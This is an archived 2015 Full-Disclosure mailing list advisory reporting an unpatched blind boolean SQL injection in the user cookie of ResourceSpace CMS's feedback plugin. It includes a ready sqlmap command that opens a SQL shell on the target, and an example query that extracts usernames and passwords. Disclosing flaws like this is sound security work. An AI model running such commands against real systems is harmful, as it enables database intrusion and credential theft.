| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 22 Aug 2015 11:53:56 -0700
From: William Reyor <opticfiber@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Blind boolean SQL injection vulnerability in ResourceSpace CMS
Title: Blind boolean sql injection vulnerability in ResourceSpace CMS
Author: William F. Reyor III
Contact: opticfiber@...il.com
Published: August 22 2015
Vendor: Montala Limited
Vendor url: www.resourcespace.org
Software: ResourceSpace Digital Asset Management Software
Versions: 7.3.7009 and prior
Status: Unpatched
Vulnerable scripts:
/plugins/feedback/pages/feedback.php
Description:
There is blind boolean SQL injection vulnerability in the user cookie on
the /plugins/feedback/pages/feedback.php application.
This can be validated with sqlmap with the following flags, giving a full
sql shell:
./sqlmap.py -u "http://<hostname>/plugins/feedback/pages/feedback.php"
--cookie="user=test" --level=2 --technique=B --sql-shell
This also allows an attacker to execute arbitrary queries such as
'select username, password, usergroup from user
--
William Reyor
*"L'essentiel est invisible pour les yeux"*
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists